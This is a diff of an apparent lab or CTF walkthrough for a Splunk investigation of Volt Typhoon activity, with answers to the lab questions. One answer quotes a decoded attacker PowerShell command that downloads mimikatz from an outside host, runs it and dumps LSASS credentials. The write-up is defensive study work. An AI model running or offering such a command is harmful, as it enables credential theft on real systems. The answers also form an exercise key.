UVSasa/Splunk-Investigations/Volt_Typhoon_Investigation.md

 2. What is the full decoded command the attacker uses to download and run mimikatz?
 --------------------------------------------------------------------------------------------------------------------------------------------------------------------
 ### Walkthrough
 1) This was another one that could be found by doing some research on the APT in Mitre website.
 Just by scrolling through and learning about some of their common TTP's I was able to find the potential answers.
+Ans: OpenSSH, putty, realvnc

 <img width="956" height="441" alt="CR1" src="https://github.com/user-attachments/assets/391a3770-6d0a-4f67-a06e-057b6d10603f" />
 <img width="958" height="442" alt="CR2" src="https://github.com/user-attachments/assets/689b1e6b-16ff-48a3-a717-34e65884dcce" />

 ---

-2) To find the full command I ied to filter by key words to no avail then simply filterd the powershell logs and started searching them one by one.
+2) To find the full command I tried to filter by key words to no avail then simply filterd the powershell logs and started searching them one by one.
 After scrolling through 6 pages of events, I eventually came upon this long encoded command and knew it was something.
 I copied it into cyberchef to decode it and was able to see the command that used to download mimikatz.
+Ans: Invoke-WebRequest -Uri "http://voltyp.com/3/tlz/mimikatz.exe" -OutFile "C:\Temp\db2\mimikatz.exe"; Start-Process -FilePath "C:\Temp\db2\mimikatz.exe" -ArgumentList @("sekurlsa::minidump lsass.dmp", "exit") -NoNewWindow -Wait

 <img width="953" height="413" alt="Mi1" src="https://github.com/user-attachments/assets/bbd6deed-dab5-47a4-9e15-7f6af94dc9c7" />